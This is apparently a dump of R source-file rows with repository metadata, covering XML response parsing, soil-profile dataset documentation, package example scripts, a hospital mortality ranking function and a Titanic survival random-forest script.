xml_build_list <- function(params) {
  if (length(params) == 0) {
    return(list())
  }
  built <- lapply(params, xml_build)
  if (tag_get(params, "flattened") != "") {
    element_name <- tag_get(params, "locationName")
  } else {
    element_name <- tag_get(params, "locationNameList")
    if (element_name == "") {
      element_name <- "member"
    }
  }
  names(built) <- rep(element_name, length(built))
  built
}
# Serialize a scalar for XML output, converting per the shape's "type"
# tag. `unlist` collapses nested single-element lists so the value is a
# plain vector before conversion.
xml_build_scalar <- function(params) {
  values <- unlist(params)
  if (length(values) == 0) {
    return(NULL)
  }
  convert <- switch(
    tag_get(params, "type"),
    blob = raw_to_base64,
    boolean = convert_boolean,
    double = ,
    float = ,
    integer = ,
    long = as.numeric,
    timestamp = function(x) as_timestamp(x, format = "iso8601"),
    as.character
  )
  as.list(convert(values))
}
#-------------------------------------------------------------------------------
# Unmarshal parsed XML `data` into the shape described by `interface`.
# When `result_name` names a wrapper element present at the document
# root, parsing descends into that element first.
xml_unmarshal <- function(data, interface, result_name = NULL) {
  if (is.null(data)) {
    return(interface)
  }
  root <- data[[1]]
  wrapped <- !is.null(result_name) && result_name %in% names(root)
  if (wrapped) {
    root <- root[[result_name]]
  }
  xml_parse(root, interface)
}
# Unmarshal an error document into an Error object; returns NULL when
# the document carries neither an error code nor a message.
xml_unmarshal_error <- function(data, status_code) {
  error_response <- lapply(data[[1]]$Error, unlist)
  code <- error_response$Code
  message <- error_response$Message
  if (is.null(code) && is.null(message)) {
    return(NULL)
  }
  Error(code, message, status_code, error_response)
}
# Convert an API response node to the shape given in `interface`,
# dispatching on the interface's type; scalars are the fallback.
#
# e.g. convert EC2 API response
#   `list(reservationSet = "foo", nextToken = "bar")`
# to output shape
#   `list(Reservations = foo, NextToken = bar)`.
xml_parse <- function(node, interface) {
  switch(
    type(interface),
    structure = xml_parse_structure(node, interface),
    map = xml_parse_map(node, interface),
    list = xml_parse_list(node, interface),
    xml_parse_scalar(node, interface)
  )
}
# Parse an XML node into a structure shape, field by field.
xml_parse_structure <- function(node, interface) {
  payload <- tag_get(node, "payload")
  if (length(payload) > 0 && payload != "") {
    # NOTE(review): this reads the "payload" tag from the parsed XML
    # *node* (not from `interface`) and then recurses with that tag
    # value -- a string -- in place of `node`. Looks suspicious; confirm
    # against the tag conventions used by the rest of the package.
    result <- xml_parse_structure(payload, interface)
    return(result)
  }
  result <- interface
  for (name in names(interface)) {
    field <- interface[[name]]
    # Skip fields that don't come from the response body.
    if (tag_get(field, "location") != "") {
      next
    }
    # Element name in the XML: locationNameList for flattened lists,
    # otherwise locationName, falling back to the field name itself.
    node_name <- name
    flattened <- tag_get(field, "flattened") != ""
    if (flattened && tag_get(field, "locationNameList") != "") {
      node_name <- tag_get(field, "locationNameList")
    } else if (tag_get(field, "locationName") != "") {
      node_name <- tag_get(field, "locationName")
    }
    elem <- node[[node_name]]
    if (flattened) {
      # Flattened lists arrive as repeated sibling elements.
      elem <- node[names(node) == node_name]
    }
    parsed <- xml_parse(elem, field)
    result[[name]] <- parsed
  }
  return(result)
}
# Parse each child of `node` against the list's element interface.
# Scalar element types collapse to an atomic vector.
xml_parse_list <- function(node, interface) {
  if (length(node) == 0) {
    return(list())
  }
  element_interface <- interface[[1]]
  parsed <- lapply(unname(node), xml_parse, interface = element_interface)
  if (type(element_interface) == "scalar") {
    parsed <- unlist(parsed)
  }
  parsed
}
# Parse a map node. A map with several entries arrives as repeated
# identically-named children; a single entry arrives unwrapped and is
# wrapped here so both cases iterate the same way.
xml_parse_map <- function(node, interface) {
  if (length(node) == 0) {
    return(list())
  }
  entries <- if (length(unique(names(node))) == 1) node else list(node)
  result <- list()
  for (entry in entries) {
    result <- c(result, xml_parse_map_entry(entry, interface))
  }
  result
}
# Parse one map entry into a single-element named list. Key/value
# element names default to "key"/"value" unless overridden by tags.
xml_parse_map_entry <- function(node, interface) {
  key_field <- tag_get(interface, "locationNameKey")
  value_field <- tag_get(interface, "locationNameValue")
  if (key_field == "") key_field <- "key"
  if (value_field == "") value_field <- "value"
  out <- list()
  out[[unlist(node[[key_field]])]] <- xml_parse(node[[value_field]], interface[[1]])
  out
}
# Convert a scalar XML node to the R type named by the interface's
# "type" tag. `unlist` collapses xml2's nested representation
# (<foo>abc</foo> parses as `list(foo = list("abc"))`) to a vector.
xml_parse_scalar <- function(node, interface) {
  values <- unlist(node)
  convert <- switch(
    tag_get(interface, "type"),
    blob = base64_to_raw,
    boolean = as.logical,
    double = ,
    float = ,
    integer = ,
    long = as.numeric,
    timestamp = function(x) as_timestamp(x, format = "iso8601"),
    as.character
  )
  convert(values)
}
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/data-documentation.R
\docType{data}
\name{sp3}
\alias{sp3}
\title{Soil Profile Data Example 3}
\format{
A data frame with 46 observations on the following 17 variables.
\describe{ \item{id}{soil id} \item{top}{horizon upper
boundary (cm)} \item{bottom}{horizon lower boundary (cm)}
\item{clay}{clay content} \item{cec}{CEC by ammonium acetate
at pH 7} \item{ph}{pH in 1:1 water-soil mixture}
\item{tc}{total carbon percent} \item{hue}{Munsell hue
(dry)} \item{value}{Munsell value (dry)}
\item{chroma}{Munsell chroma (dry)} \item{mid}{horizon
midpoint (cm)} \item{ln_tc}{natural log of total carbon percent}
\item{L}{color: l-coordinate, CIE-LAB colorspace (dry)}
\item{A}{color: a-coordinate, CIE-LAB colorspace (dry)}
\item{B}{color: b-coordinate, CIE-LAB colorspace (dry)}
\item{name}{horizon name} \item{soil_color}{horizon color} }
}
\description{
Soil samples from 10 soil profiles, taken from the Sierra Foothill Region of
California.
}
\details{
These data were collected to support research funded by the Kearney
Foundation of Soil Science.
}
\examples{
## this example investigates the concept of a "median profile"
# required packages
if (require(ape) & require(cluster)) {
data(sp3)
# generate a RGB version of soil colors
# and convert to HSV for aggregation
sp3$h <- NA
sp3$s <- NA
sp3$v <- NA
sp3.rgb <- with(sp3, munsell2rgb(hue, value, chroma, return_triplets = TRUE))
sp3[, c('h', 's', 'v')] <- t(with(sp3.rgb, rgb2hsv(r, g, b, maxColorValue = 1)))
# promote to SoilProfileCollection
depths(sp3) <- id ~ top + bottom
# aggregate across entire collection
a <- slab(sp3, fm = ~ clay + cec + ph + h + s + v, slab.structure = 10)
# check
str(a)
# convert back to wide format
library(data.table)
a.wide.q25 <- dcast(as.data.table(a), top + bottom ~ variable, value.var = c('p.q25'))
a.wide.q50 <- dcast(as.data.table(a), top + bottom ~ variable, value.var = c('p.q50'))
a.wide.q75 <- dcast(as.data.table(a), top + bottom ~ variable, value.var = c('p.q75'))
# add a new id for the 25th, 50th, and 75th percentile pedons
a.wide.q25$id <- 'Q25'
a.wide.q50$id <- 'Q50'
a.wide.q75$id <- 'Q75'
# combine original data with "mean profile"
vars <- c('top', 'bottom', 'id', 'clay', 'cec', 'ph', 'h', 's', 'v')
# make data.frame version of sp3
sp3.df <- as(sp3, 'data.frame')
sp3.grouped <- as.data.frame(rbind(as.data.table(horizons(sp3))[, .SD, .SDcol = vars],
a.wide.q25[, .SD, .SDcol = vars],
a.wide.q50[, .SD, .SDcol = vars],
a.wide.q75[, .SD, .SDcol = vars]))
# re-constitute the soil color from HSV triplets
# convert HSV back to standard R colors
sp3.grouped$soil_color <- with(sp3.grouped, hsv(h, s, v))
# give each horizon a name
sp3.grouped$name <- paste(
round(sp3.grouped$clay),
'/' ,
round(sp3.grouped$cec),
'/',
round(sp3.grouped$ph, 1)
)
# first promote to SoilProfileCollection
depths(sp3.grouped) <- id ~ top + bottom
plot(sp3.grouped)
## perform comparison, and convert to phylo class object
## D is rescaled to [0,]
d <- NCSP(
sp3.grouped,
vars = c('clay', 'cec', 'ph'),
maxDepth = 100,
k = 0.01
)
h <- agnes(d, method = 'ward')
p <- ladderize(as.phylo(as.hclust(h)))
# look at distance plot-- just the median profile
plot_distance_graph(d, 12)
# similarity relative to median profile (profile #12)
round(1 - (as.matrix(d)[12, ] / max(as.matrix(d)[12, ])), 2)
## make dendrogram + soil profiles
# setup plot: note that D has a scale of [0,1]
par(mar = c(1, 1, 1, 1))
p.plot <- plot(p,
cex = 0.8,
label.offset = 3,
direction = 'up',
y.lim = c(200, 0),
x.lim = c(1.25, length(sp3.grouped) + 1),
show.tip.label = FALSE)
# get the last plot geometry
lastPP <- get("last_plot.phylo", envir = .PlotPhyloEnv)
# the original labels, and new (indexed) order of pedons in dendrogram
d.labels <- attr(d, 'Labels')
new_order <- sapply(1:lastPP$Ntip,
function(i)
which(as.integer(lastPP$xx[1:lastPP$Ntip]) == i))
# plot the profiles, in the ordering defined by the dendrogram
# with a couple fudge factors to make them fit
plotSPC(
sp3.grouped,
color = "soil_color",
plot.order = new_order,
y.offset = max(lastPP$yy) + 10,
width = 0.1,
cex.names = 0.5,
add = TRUE
)
}
}
\references{
http://casoilresource.lawr.ucdavis.edu/
}
\keyword{datasets}
| /man/sp3.Rd | no_license | ncss-tech/aqp | R | false | true | 4,650 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/data-documentation.R
\docType{data}
\name{sp3}
\alias{sp3}
\title{Soil Profile Data Example 3}
\format{
A data frame with 46 observations on the following 15 variables.
\describe{ \item{id}{soil id} \item{top}{horizon upper
boundary (cm)} \item{bottom}{horizon lower boundary (cm)}
\item{clay}{clay content} \item{cec}{CEC by ammonium acetate
at pH 7} \item{ph}{pH in 1:1 water-soil mixture}
\item{tc}{total carbon percent} \item{hue}{Munsell hue
(dry)} \item{value}{Munsell value (dry)}
\item{chroma}{Munsell chroma (dry)} \item{mid}{horizon
midpoint (cm)} \item{ln_tc}{natural log of total carbon percent}
\item{L}{color: l-coordinate, CIE-LAB colorspace (dry)}
\item{A}{color: a-coordinate, CIE-LAB colorspace (dry)}
\item{B}{color: b-coordinate, CIE-LAB colorspace (dry)}
\item{name}{horizon name} \item{soil_color}{horizon color} }
}
\description{
Soil samples from 10 soil profiles, taken from the Sierra Foothill Region of
California.
}
\details{
These data were collected to support research funded by the Kearney
Foundation of Soil Science.
}
\examples{
## this example investigates the concept of a "median profile"
# required packages
if (require(ape) & require(cluster)) {
data(sp3)
# generate a RGB version of soil colors
# and convert to HSV for aggregation
sp3$h <- NA
sp3$s <- NA
sp3$v <- NA
sp3.rgb <- with(sp3, munsell2rgb(hue, value, chroma, return_triplets = TRUE))
sp3[, c('h', 's', 'v')] <- t(with(sp3.rgb, rgb2hsv(r, g, b, maxColorValue = 1)))
# promote to SoilProfileCollection
depths(sp3) <- id ~ top + bottom
# aggregate across entire collection
a <- slab(sp3, fm = ~ clay + cec + ph + h + s + v, slab.structure = 10)
# check
str(a)
# convert back to wide format
library(data.table)
a.wide.q25 <- dcast(as.data.table(a), top + bottom ~ variable, value.var = c('p.q25'))
a.wide.q50 <- dcast(as.data.table(a), top + bottom ~ variable, value.var = c('p.q50'))
a.wide.q75 <- dcast(as.data.table(a), top + bottom ~ variable, value.var = c('p.q75'))
# add a new id for the 25th, 50th, and 75th percentile pedons
a.wide.q25$id <- 'Q25'
a.wide.q50$id <- 'Q50'
a.wide.q75$id <- 'Q75'
# combine original data with "mean profile"
vars <- c('top', 'bottom', 'id', 'clay', 'cec', 'ph', 'h', 's', 'v')
# make data.frame version of sp3
sp3.df <- as(sp3, 'data.frame')
sp3.grouped <- as.data.frame(rbind(as.data.table(horizons(sp3))[, .SD, .SDcol = vars],
a.wide.q25[, .SD, .SDcol = vars],
a.wide.q50[, .SD, .SDcol = vars],
a.wide.q75[, .SD, .SDcol = vars]))
# re-constitute the soil color from HSV triplets
# convert HSV back to standard R colors
sp3.grouped$soil_color <- with(sp3.grouped, hsv(h, s, v))
# give each horizon a name
sp3.grouped$name <- paste(
round(sp3.grouped$clay),
'/' ,
round(sp3.grouped$cec),
'/',
round(sp3.grouped$ph, 1)
)
# first promote to SoilProfileCollection
depths(sp3.grouped) <- id ~ top + bottom
plot(sp3.grouped)
## perform comparison, and convert to phylo class object
## D is rescaled to [0,]
d <- NCSP(
sp3.grouped,
vars = c('clay', 'cec', 'ph'),
maxDepth = 100,
k = 0.01
)
h <- agnes(d, method = 'ward')
p <- ladderize(as.phylo(as.hclust(h)))
# look at distance plot-- just the median profile
plot_distance_graph(d, 12)
# similarity relative to median profile (profile #12)
round(1 - (as.matrix(d)[12, ] / max(as.matrix(d)[12, ])), 2)
## make dendrogram + soil profiles
# setup plot: note that D has a scale of [0,1]
par(mar = c(1, 1, 1, 1))
p.plot <- plot(p,
cex = 0.8,
label.offset = 3,
direction = 'up',
y.lim = c(200, 0),
x.lim = c(1.25, length(sp3.grouped) + 1),
show.tip.label = FALSE)
# get the last plot geometry
lastPP <- get("last_plot.phylo", envir = .PlotPhyloEnv)
# the original labels, and new (indexed) order of pedons in dendrogram
d.labels <- attr(d, 'Labels')
new_order <- sapply(1:lastPP$Ntip,
function(i)
which(as.integer(lastPP$xx[1:lastPP$Ntip]) == i))
# plot the profiles, in the ordering defined by the dendrogram
# with a couple fudge factors to make them fit
plotSPC(
sp3.grouped,
color = "soil_color",
plot.order = new_order,
y.offset = max(lastPP$yy) + 10,
width = 0.1,
cex.names = 0.5,
add = TRUE
)
}
}
\references{
http://casoilresource.lawr.ucdavis.edu/
}
\keyword{datasets}
|
# Extracted example script for pRSR::GetFitHReg.
library(pRSR)
### Name: GetFitHReg
### Title: Compute loglikelihood ratio test statistic
### Aliases: GetFitHReg
### Keywords: ts
### ** Examples
#Simple Examples
# Simulate a short series with a harmonic component at frequency 2.5/10,
# then fit it with default settings.
z<-SimulateHReg(10, f=2.5/10, 1, 2)
GetFitHReg(z)
# Refit with explicit (non-unit) observation times.
t<-seq(2,20,2)
GetFitHReg(y=z, t=t)
# nf: presumably the number of candidate frequencies scanned -- see ?GetFitHReg.
GetFitHReg(z, nf=25)
| /data/genthat_extracted_code/pRSR/examples/GetFitHReg.Rd.R | no_license | surayaaramli/typeRrh | R | false | false | 277 | r | library(pRSR)
# Extracted example script for pRSR::GetFitHReg.
### Name: GetFitHReg
### Title: Compute loglikelihood ratio test statistic
### Aliases: GetFitHReg
### Keywords: ts
### ** Examples
#Simple Examples
# Simulate a short series with a harmonic component at frequency 2.5/10,
# then fit it with default settings.
z<-SimulateHReg(10, f=2.5/10, 1, 2)
GetFitHReg(z)
# Refit with explicit (non-unit) observation times.
t<-seq(2,20,2)
GetFitHReg(y=z, t=t)
# nf: presumably the number of candidate frequencies scanned -- see ?GetFitHReg.
GetFitHReg(z, nf=25)
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/autoTreshold.R
\name{autoTreshold}
\alias{autoTreshold}
\title{Automatic threshold estimation (placeholder -- needs a real title)}
\usage{
autoTreshold(
fn_df,
fn_marker,
fn_maxNOfEvents = 100,
fn_tol = 1e-05,
fn_expansion = 1,
fn_seed = 1234
)
}
\description{
Automatically estimate a threshold for the given marker (placeholder description -- TODO: document properly).
}
| /man/autoTreshold.Rd | no_license | luigidolcetti/RUNIMC | R | false | true | 314 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/autoTreshold.R
\name{autoTreshold}
\alias{autoTreshold}
\title{Automatic threshold estimation (placeholder -- needs a real title)}
\usage{
autoTreshold(
fn_df,
fn_marker,
fn_maxNOfEvents = 100,
fn_tol = 1e-05,
fn_expansion = 1,
fn_seed = 1234
)
}
\description{
Automatically estimate a threshold for the given marker (placeholder description -- TODO: document properly).
}
|
# Extracted example script for GISTools::north.arrow.
library(GISTools)
### Name: North Arrow
### Title: Add a north arrow to a map
### Aliases: north.arrow
### ** Examples
# Read in map data for New Haven
data(newhaven)
# Plot census block boundaries
plot(blocks)
# Add a north arrow
# (x, y) position is in map units; length is 0.5 miles converted to feet,
# so the map CRS is presumably in feet -- confirm with ?north.arrow.
north.arrow(534750,152000,miles2ft(0.5),col='cyan')
# ... and a title
title('New Haven (CT)')
| /data/genthat_extracted_code/GISTools/examples/north.arrow.Rd.R | no_license | surayaaramli/typeRrh | R | false | false | 332 | r | library(GISTools)
# Extracted example script for GISTools::north.arrow.
### Name: North Arrow
### Title: Add a north arrow to a map
### Aliases: north.arrow
### ** Examples
# Read in map data for New Haven
data(newhaven)
# Plot census block boundaries
plot(blocks)
# Add a north arrow
# (x, y) position is in map units; length is 0.5 miles converted to feet,
# so the map CRS is presumably in feet -- confirm with ?north.arrow.
north.arrow(534750,152000,miles2ft(0.5),col='cyan')
# ... and a title
title('New Haven (CT)')
|
# Return the name of the hospital in `state` with the lowest 30-day
# mortality rate for the requested outcome, breaking ties alphabetically.
#
# state            : two-letter US state abbreviation (checked against
#                    state.abb, so DC/territories are rejected -- TODO
#                    confirm that is intended).
# outcome_from_user: outcome name such as "heart attack"; spaces become
#                    dots and the result is matched case-insensitively
#                    against the "Hospital...30.Day.Death..." columns.
best<-function(state, outcome_from_user)
{
  # Validate the state abbreviation.
  if (!state %in% state.abb)
  {
    stop("invalid state")
  }
  outcome_file <- read.csv("./rprog-data-ProgAssignment3-data/outcome-of-care-measures.csv", colClasses = 'character')
  column_list <- names(outcome_file)
  # Columns that hold 30-day death (mortality) rates.
  hospital_30day_mortalitiy_columns <- column_list[grepl(pattern = "^Hospital.+30.Day.Death", column_list, ignore.case = TRUE)]
  # "heart attack" -> "heart.attack" so it can match a column name.
  outcome_to_check <- gsub(" ", ".", outcome_from_user)
  outcome <- hospital_30day_mortalitiy_columns[grepl(pattern = outcome_to_check, hospital_30day_mortalitiy_columns, ignore.case = TRUE)]
  # Exactly one column must match, otherwise the outcome is unknown or
  # ambiguous. (The leftover debug print() of the match count is gone, as
  # is the unused library("dplyr") attach.)
  if (length(outcome) != 1)
  {
    stop("invalid outcome")
  }
  # Non-numeric entries such as "Not Available" become NA here.
  outcome_file[, outcome] <- as.numeric(outcome_file[, outcome])
  # Keep rows with a usable rate for *this* outcome only; the original's
  # complete.cases() over every column also dropped hospitals that were
  # merely missing values in unrelated columns.
  complete_values <- outcome_file[!is.na(outcome_file[, outcome]), c(outcome, "State", "Hospital.Name")]
  state_filtered_values <- complete_values[complete_values[, "State"] == state, ]
  rows_with_min_outcome_values <- state_filtered_values[state_filtered_values[, outcome] == min(state_filtered_values[, outcome]), ]
  # Break ties alphabetically and return a single name. (The original
  # computed the tie-break subset and discarded it, then returned every
  # tied hospital.)
  sort(rows_with_min_outcome_values[, "Hospital.Name"])[1]
}
best<-function(state, outcome_from_user)
{
  # Find the hospital with the lowest 30-day mortality rate for the
  # requested outcome in `state`; ties break alphabetically.
  # Validate the state abbreviation (state.abb excludes DC/territories --
  # TODO confirm that is intended).
  if (!state %in% state.abb)
  {
    stop("invalid state")
  }
  outcome_file <- read.csv("./rprog-data-ProgAssignment3-data/outcome-of-care-measures.csv", colClasses = 'character')
  column_list <- names(outcome_file)
  # Columns that hold 30-day death (mortality) rates.
  hospital_30day_mortalitiy_columns <- column_list[grepl(pattern = "^Hospital.+30.Day.Death", column_list, ignore.case = TRUE)]
  # "heart attack" -> "heart.attack" so it can match a column name.
  outcome_to_check <- gsub(" ", ".", outcome_from_user)
  outcome <- hospital_30day_mortalitiy_columns[grepl(pattern = outcome_to_check, hospital_30day_mortalitiy_columns, ignore.case = TRUE)]
  # Exactly one column must match, otherwise the outcome is unknown or
  # ambiguous. (The leftover debug print() of the match count is gone, as
  # is the unused library("dplyr") attach.)
  if (length(outcome) != 1)
  {
    stop("invalid outcome")
  }
  # Non-numeric entries such as "Not Available" become NA here.
  outcome_file[, outcome] <- as.numeric(outcome_file[, outcome])
  # Keep rows with a usable rate for *this* outcome only; the original's
  # complete.cases() over every column also dropped hospitals that were
  # merely missing values in unrelated columns.
  complete_values <- outcome_file[!is.na(outcome_file[, outcome]), c(outcome, "State", "Hospital.Name")]
  state_filtered_values <- complete_values[complete_values[, "State"] == state, ]
  rows_with_min_outcome_values <- state_filtered_values[state_filtered_values[, outcome] == min(state_filtered_values[, outcome]), ]
  # Break ties alphabetically and return a single name. (The original
  # computed the tie-break subset and discarded it, then returned every
  # tied hospital.)
  sort(rows_with_min_outcome_values[, "Hospital.Name"])[1]
}
# -----------------------
# Setting
library(tree)
require(maptree)
library(randomForest)
setwd("/Users/aszostek/Projects/Kaggle/Titanic")
source("./Utils/submission_utils.R")
iteration = 8
# -----------------------
# Read Data
train.org <- read.csv(file="./Data/train.csv")
test.org <- read.csv(file="./Data/test.csv")
# -----------------------
# Data transoformations and feature creation
# Extract the surname from a passenger name formatted as
# "Last, Title. First ...": everything before the first comma.
getlastname <- function(name) {
  sub(",.*$", "", name)
}
# Extract the honorific title ("Mr", "Miss", "Master", ...) from a
# passenger name formatted as "Last, Title. First ...": drop everything
# up to ", ", then everything from the first ". " onwards.
gettitle <- function(name) {
  after_comma <- sub("^.*, ", "", name)
  sub("\\. .*$", "", after_comma)
}
# Function which calculates an age for a given title Mr, Miss etc
# It uses information from both training and test set
# This function operates on original training set and test set!
# Fit a linear model predicting passenger age from title and class,
# pooling the training and test sets.
# Reads the globals `train.org` and `test.org`; returns the fitted lm.
# NOTE(review): a fake random "survived" column is prepended to the test
# set only so its columns line up with the training set for rbind(); it
# is never used by the model.
age_title<-function()
{
  # take original data
  tr1<-train.org
  te1<-test.org
  # add a dummy survived column so both tables have identical columns
  te1<-cbind(factor(sample(c(0,1),nrow(te1),replace=T),levels=c(0,1)),te1)
  names(te1)[[1]]<-"survived"
  # Combine the two tables together
  all<-rbind(tr1,te1)
  # keep only rows where age is known (these train the model)
  all<-all[!is.na(all$age),]
  # Extract the title ("Mr", "Miss", ...) from the name column
  # (assumes column 3 is the passenger name — TODO confirm)
  lname<-as.character(all[[3]])
  lname<-sub("^.*, ","",lname)
  lname<-sub("\\. .*$","",lname)
  all$title<-as.factor(lname)
  all<-all[,c("age","title","pclass")]
  all$pclass <- as.factor(all$pclass)
  # age ~ title + pclass: title encodes sex/age-group, class adds signal
  fit <- lm(age ~ title+pclass,data=all)
  return(fit)
}
# Predict a single passenger's age from the title+class model.
# NOTE(review): age_title() re-reads the globals and refits the lm on
# every call; inside the per-row loop in data.transformation this is
# very slow — the fit could be computed once and reused.
guess.age<-function(passanger)
{
  return(predict(age_title(),newdata=passanger)[[1]])
}
# Clean a raw Titanic data frame (training or test) and engineer
# features: fills missing embarkation port, derives title / last name /
# family size, normalises column classes, imputes missing ages via the
# title+class model, and drops columns that are no longer needed.
# Works for both sets; a test set gets a dummy "survived" column so both
# outputs have the same shape.
data.transformation<-function(data)
{
  # If embarked missing fill with most frequent option which is S
  data[data$embarked=="","embarked"]<-"S"
  # calculate title of the passanger
  data$title <- unlist(lapply(as.character(data$name),function(x) gettitle(x)))
  # calculate last name
  data$lname <- unlist(lapply(as.character(data$name),function(x) getlastname(x)))
  # family size = siblings/spouses + parents/children + the passenger
  data$family <- data$sibsp+data$parch+1
  # Clean classes of each column
  if(names(data)[[1]]=="survived") data$survived<-as.factor(data$survived)
  data$pclass<-as.factor(data$pclass)
  data$name<-as.character(data$name)
  data$ticket<-as.character(data$ticket)
  data$cabin<-as.character(data$cabin)
  data$embarked<-as.factor(as.character(data$embarked))
  data$title<-as.factor(as.character(data$title))
  # If it is a test set and doesn't have a survived column add one with fake data
  # it is useful to have the same number of columns in training and test set
  if(names(data)[[1]]!="survived")
  {
    data<-cbind(factor(sample(c(0,1),nrow(data),replace=T),levels=c(0,1)),data)
    names(data)[[1]]<-"survived"
  }
  # Fill in missing age using the title+class model.
  # NOTE(review): guess.age() refits the lm for every missing row — slow.
  for(i in 1:nrow(data))
  {
    if (is.na(data[i,"age"]))
      data[i,"age"]<-guess.age(data[i,])
  }
  # Drop unused columns by position (name, ticket, fare, cabin and one
  # engineered column — assumes the column order above; TODO confirm)
  return(data[,c(-3,-8,-9,-10,-12)])
}
train <- data.transformation(train.org)
test <- data.transformation(test.org)
# -----------------------
# Modeling
# Train classification tree on a training set
t1<-randomForest(survived~.,data=train,mtry=4,ntree=200)
modelacc(train,t1)
# ------------------------
# Cross Validate
# k-fold cross-validation of a random forest on `data`.
# The rows are cut into k consecutive blocks of floor(nrow/k) rows (any
# remainder rows are never held out); for each fold a forest is trained
# on the remaining rows and the fold's accuracy — the proportion of
# held-out rows whose prediction matches column 1 — is recorded.
# Returns the vector of k per-fold accuracies.
kfold.rf <- function(data, k) {
  fold_size <- as.integer(nrow(data) / k)
  acc <- rep(NA, k)
  for (fold in 1:k) {
    held_out_rows <- ((fold - 1) * fold_size + 1):(fold * fold_size)
    holdout <- data[held_out_rows, ]
    forest <- randomForest(survived ~ ., data = data[-held_out_rows, ])
    acc[fold] <- sum(holdout[[1]] == predict(forest, newdata = holdout, type = "class")) / nrow(holdout)
  }
  return(acc)
}
# Leave-one-out cross-validation of a random forest: each row in turn is
# held out, a forest is trained on all the other rows, and a 1/0 hit
# indicator (prediction equals column 1 of the held-out row) is
# recorded. Returns the vector of per-row indicators.
leavoneout.rf <- function(data) {
  hits <- rep(NA, nrow(data))
  for (row_idx in 1:nrow(data)) {
    forest <- randomForest(survived ~ ., data = data[c(-row_idx), ])
    holdout <- data[row_idx, ]
    hits[row_idx] <- sum(holdout[[1]] == predict(forest, newdata = holdout, type = "class")) / nrow(holdout)
  }
  return(hits)
}
a<-kfold.rf(train,10)
a
mean(a)
# -----------------------
# Submission file
submission = predict(t1,newdata=test,type="class")
test_submission = test
test_submission[[1]] <- submission
# write file
submission_file_name = paste("./Submissions/submission",as.character(iteration),".csv",sep="")
submission_file_name
write.csv(test_submission,file=submission_file_name,row.names=FALSE)
diffsub(7,8)
#########
# Tests
rbind(test[test$lname=="Palsson",],train[train$lname=="Palsson",])
rbind(test[test$lname=="Rice",],train[train$lname=="Rice",])
rbind(test[test$lname=="Fortune",],train[train$lname=="Fortune",])
rbind(test[test$lname=="Panula",],train[train$lname=="Panula",])
rbind(test[test$lname=="Sage",],train[train$lname=="Sage",])
| /Code/Titanic_iteration8.R | no_license | astronerma/Titanic | R | false | false | 4,718 | r | # -----------------------
# Setting
library(tree)
require(maptree)
library(randomForest)
setwd("/Users/aszostek/Projects/Kaggle/Titanic")
source("./Utils/submission_utils.R")
iteration = 8
# -----------------------
# Read Data
train.org <- read.csv(file="./Data/train.csv")
test.org <- read.csv(file="./Data/test.csv")
# -----------------------
# Data transoformations and feature creation
# Surname of a passenger: the part of "Last, Title. First ..." that
# precedes the first comma.
getlastname <- function(name) {
  surname <- sub(",.*$", "", name)
  surname
}
# Honorific title of a passenger: strip the leading "Last, " prefix,
# then strip everything from the first ". " onwards.
gettitle <- function(name) {
  title <- sub("^.*, ", "", name)
  title <- sub("\\. .*$", "", title)
  title
}
# Function which calculates an age for a given title Mr, Miss etc
# It uses information from both training and test set
# This function operates on original training set and test set!
age_title<-function()
{
# take original data
tr1<-train.org
te1<-test.org
# add survivor column to test set
te1<-cbind(factor(sample(c(0,1),nrow(te1),replace=T),levels=c(0,1)),te1)
names(te1)[[1]]<-"survived"
# Combine two tables togethe
all<-rbind(tr1,te1)
# select only samples with age provided
all<-all[!is.na(all$age),]
# Extract only Mr, Miss. etc
lname<-as.character(all[[3]])
lname<-sub("^.*, ","",lname)
lname<-sub("\\. .*$","",lname)
all$title<-as.factor(lname)
all<-all[,c("age","title","pclass")]
all$pclass <- as.factor(all$pclass)
fit <- lm(age ~ title+pclass,data=all)
return(fit)
}
guess.age<-function(passanger)
{
return(predict(age_title(),newdata=passanger)[[1]])
}
data.transformation<-function(data)
{
# If embarked missing fill with most frequent option which is S
data[data$embarked=="","embarked"]<-"S"
# calculate title of the passanger
data$title <- unlist(lapply(as.character(data$name),function(x) gettitle(x)))
# calculate last name
data$lname <- unlist(lapply(as.character(data$name),function(x) getlastname(x)))
# calculate family on board
data$family <- data$sibsp+data$parch+1
# Clean classes of each column
if(names(data)[[1]]=="survived") data$survived<-as.factor(data$survived)
data$pclass<-as.factor(data$pclass)
data$name<-as.character(data$name)
data$ticket<-as.character(data$ticket)
data$cabin<-as.character(data$cabin)
data$embarked<-as.factor(as.character(data$embarked))
data$title<-as.factor(as.character(data$title))
# If it is a test set and doesn't have a survived column add one with fake data
# it is useful to have the same number of columns in training and test set
if(names(data)[[1]]!="survived")
{
data<-cbind(factor(sample(c(0,1),nrow(data),replace=T),levels=c(0,1)),data)
names(data)[[1]]<-"survived"
}
# Fill in missing age
# This function guesses age based on the title of the passange
for(i in 1:nrow(data))
{
if (is.na(data[i,"age"]))
data[i,"age"]<-guess.age(data[i,])
}
return(data[,c(-3,-8,-9,-10,-12)])
}
train <- data.transformation(train.org)
test <- data.transformation(test.org)
# -----------------------
# Modeling
# Train classification tree on a training set
t1<-randomForest(survived~.,data=train,mtry=4,ntree=200)
modelacc(train,t1)
# ------------------------
# Cross Validate
kfold.rf<-function(data,k)
{
n<-as.integer(nrow(data)/k)
err.vect<-rep(NA,k)
for (i in 1:k)
{
subset<-((i-1)*n+1):(i*n)
train<-data[-subset,]
test<-data[subset,]
forestpred<-randomForest(survived~.,data=train)
err<-sum(test[[1]]==predict(forestpred,newdata=test,type="class"))/nrow(test)
err.vect[i]<-err
}
return(err.vect)
}
leavoneout.rf<-function(data)
{
err.vect<-rep(NA,nrow(data))
for (i in 1:nrow(data))
{
train<-data[c(-i),]
test<-data[i,]
forestpred<-randomForest(survived~.,data=train)
err<-sum(test[[1]]==predict(forestpred,newdata=test,type="class"))/nrow(test)
err.vect[i]<-err
}
return(err.vect)
}
a<-kfold.rf(train,10)
a
mean(a)
# -----------------------
# Submission file
submission = predict(t1,newdata=test,type="class")
test_submission = test
test_submission[[1]] <- submission
# write file
submission_file_name = paste("./Submissions/submission",as.character(iteration),".csv",sep="")
submission_file_name
write.csv(test_submission,file=submission_file_name,row.names=FALSE)
diffsub(7,8)
#########
# Tests
rbind(test[test$lname=="Palsson",],train[train$lname=="Palsson",])
rbind(test[test$lname=="Rice",],train[train$lname=="Rice",])
